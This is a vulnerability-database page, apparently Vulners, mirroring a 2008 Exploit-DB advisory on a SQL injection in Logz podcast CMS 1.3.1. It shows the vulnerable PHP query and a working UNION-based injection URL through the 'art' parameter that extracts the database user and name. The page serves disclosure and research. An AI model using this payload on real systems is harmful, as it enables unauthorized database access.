Lucene search
+L

Logz podcast CMS 1.3.1 - 'art' SQL Injection

🗓️ 31 Oct 2008 00:00:00Reported by ZoRLuType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

Logz podcast CMS 1.3.1 is vulnerable to SQL injection via the 'art' parameter.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-4896
31 Oct 200800:00
circl
circl
Circl
CVE-2008-4897
31 Oct 200800:00
circl
cve
CVE
CVE-2008-4896
4 Nov 200800:00
cve
cve
CVE
CVE-2008-4897
4 Nov 200800:00
cve
cvelist
Cvelist
CVE-2008-4896
4 Nov 200800:00
cvelist
cvelist
Cvelist
CVE-2008-4897
4 Nov 200800:00
cvelist
euvd
EUVD
EUVD-2008-4875
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2008-4876
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-4896
4 Nov 200800:58
nvd
nvd
NVD
CVE-2008-4897
4 Nov 200800:58
nvd
Rows per page
[~] Logz podcast CMS version 1.3.1 Remote sql inj
[~]
[~] download: http://sourceforge.net/project/showfiles.php?group_id=107225&package_id=178479&release_id=635701
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 31.10.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q kpss : ) )
[~]
[~] -----------------------------------------------------------

file:

fichiers/add_url.php

code:

       if (isset($_GET['art'])) {
	      $Article = $_GET['art'];

	      ...

	      $Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions;
        $ResultRequete = requete_mysql($Requete);



Exploit:

http://localhost/script_path/fichiers/add_url.php?art=[SQL]

[SQL]= column number 1 (SELECT TITRE FROM ...)

1'+union+select+concat(user(),0x3a,database())/*

example:

http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/*

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-10-31]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jan 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.01446
42